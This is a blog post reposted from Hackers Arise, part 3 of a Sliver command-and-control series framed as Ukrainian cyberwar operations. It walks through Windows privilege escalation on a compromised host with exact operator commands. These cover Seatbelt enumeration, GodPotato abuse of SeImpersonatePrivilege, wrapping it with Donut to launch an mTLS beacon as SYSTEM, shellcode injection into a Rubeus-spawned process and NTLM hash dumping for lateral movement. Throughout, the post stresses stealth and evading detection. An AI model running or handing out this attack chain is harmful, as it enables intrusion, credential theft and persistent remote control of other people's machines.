National Cyber Warfare Foundation (NCWF)

Welcome back, cyberwarriors! While others are playing capture the flag (CTF) games, our cyber cossacks are playing with live ammunition to keep Putin and his cronies from overwhelming Ukraine with their brutal attacks. Here is the latest installment from Overwatch from the front lines in the cyberwar with Russia. In my previous post, we covered […]

The post Sliver: Building Command and Control (C2) During a Cyber War, Part 3 – Privilege Escalation first appeared on Hackers Arise.

Welcome back, cyberwarriors!

While others are playing capture the flag (CTF) games, our cyber cossacks are playing with live ammunition to keep Putin and his cronies from overwhelming Ukraine with their brutal attacks. Here is the latest installment from Overwatch from the front lines in the cyberwar with Russia.

In my previous post, we covered how to gain initial access and establish stable communication with a compromised host. But gaining a foothold is just the beginning. To control the system entirely and expand your presence within the network, privilege escalation becomes the next natural step. This stage, often grouped under post-exploitation, is where many red team operators extract maximum value from access: dumping credentials, moving laterally, or establishing deeper persistence. However, discretion remains key. Executing random tools and scripts will eventually set off alarms, that’s why you have to be careful. In this part we will focus on a reliable privilege escalation technique using Sliver.

Enumeration with Seatbelt

Seatbelt is a C# tool tailored for enumeration in Windows environments. It pulls together relevant system details that often expose weaknesses. With it, you can retrieve everything from currently logged-in users and scheduled tasks to Windows Defender settings, domain configuration, and misconfigured policies. It offers a stealthy way to collect a detailed view of the environment and uncover paths for privilege escalation. To operate it properly inside Sliver, ensure you place two hyphens after the tool’s name before passing arguments. This helps Sliver interpret the execution context correctly.

If Seatbelt is not yet installed:

sliver > armory install seatbelt

To run Seatbelt:

sliver (session) > seatbelt — -group=all

Alternatively, if you prefer execute-assembly or Seatbelt fails to run inside Sliver, use the SharpCollection version of it:

c2 > git clone https://github.com/Flangvik/SharpCollection

sliver (session) > execute-assembly /tools/SharpCollection/NetFramework_4.0_Any/Seatbelt.exe -group=system

Expect verbose output. Parse it carefully for user context, scheduled jobs, AV exclusions, auto-logon entries, and privilege assignments.

Enumeration with SharpUp

SharpUp is another C# tool, specifically designed to detect local privilege escalation vectors. It checks for typical Windows misconfigurations such as unquoted service paths, improper registry and directory permissions, or AlwaysInstallElevated keys. It’s more direct in its checks compared to Seatbelt, but also less comprehensive. SharpUp should be considered an auxiliary tool rather than your first go-to.

Exploiting Privileges

One privilege you may come across is SeImpersonatePrivilege. This allows a process to impersonate another user and is widely abused for local privilege escalation using named pipe tricks. Multiple exploits target this privilege, including PrintSpoofer, RoguePotato, and GodPotato.

To confirm its presence and prepare for exploitation, use Seatbelt or SharpUp or getprivs to see the privileges of your current session. If SeImpersonatePrivilege is listed, proceed to exploit.

Download GodPotato:
wget https://github.com/BeichenDream/GodPotato/releases/download/V1.20/GodPotato-NET4.exe

Execute it and see the result:

sliver (session) > execute-assembly /tmp/GodPotato-NET4.exe -cmd “whoami”

If the command returns “NT AUTHORITY\SYSTEM,” the exploit works. Next, we’ll embed our Sliver beacon into the GodPotato logic using Donut. This will execute our beacon as SYSTEM.

Payload Generation with Donut

Donut is a tool for generating in-memory shellcode loaders from .NET assemblies, PE files, or scripts. It produces shellcode that can be injected directly, bypassing disk-based detections.

Install it:
c2 > git clone https://github.com/TheWover/donut.git
c2 > cd donut/; make -f Makefile

After that you can test it by running this:

c2 > ./donut

Next step is generating a new beacon that the exploit will execute:
sliver > generate beacon –mtls –skip-symbols -N mtls_beacon –save /tmp

Upload it:
sliver (session) > upload /tmp/mtls_beacon.exe C:\\Windows\\Temp\\mtls_beacon.exe

Now we get back to Donut to modify the logic of our exploit. Our goal is to execute the beacon under the highest privileges once the exploit runs. Here is how:
c2 > ./donut -i /tmp/GodPotato-NET4.exe -a 2 -b 2 -p ‘-cmd c:\windows\temp\mtls_beacon.exe’ -o /tmp/godpotato.bin

Now we have a binary file that will be used to escalate the privileges.

Creating a Sacrificial Process with Rubeus

Before launching your exploit, it’s often smart to inject your shellcode into a dummy process for stealth and safety. Rubeus can help spin up a clean instance of notepad.exe for this purpose.

sliver (session) > execute-assembly /tmp/Rubeus.exe createnetonly /program:C:\windows\system32
otepad.exe

Grab the Process ID (PID) and get ready for shellcode injection.

Injecting Shellcode

Execute the GodPotato payload as shellcode inside the dummy process:
sliver (session) > execute-shellcode -p 1352 /tmp/godpotato.bin

Wait a few minutes. The new beacon, running as SYSTEM, will check back in. At this point, you have SYSTEM-level access on the compromised host.

Now you can interact with it or promote it to a session by typing interactive:
sliver (session) > interactive

Dumping Hashes

Finally, execute hashdump to extract all NTLM hashes from the compromised system. Once retrieved, feed them into nxc to enumerate which machines across the network have already been compromised.

Conclusion

Privilege escalation is a critical step in post-exploitation, especially when aiming to persist on a machine or move laterally across a network. Tools like Seatbelt, SharpUp, and Rubeus can help you uncover vulnerabilities while Donut and GodPotato provide the means to act on them silently. With the beacon now running under the highest privileges available, you are in full control of the target machine.

In Part 4, we will move deeper into persistence and learn how to secure your sessions.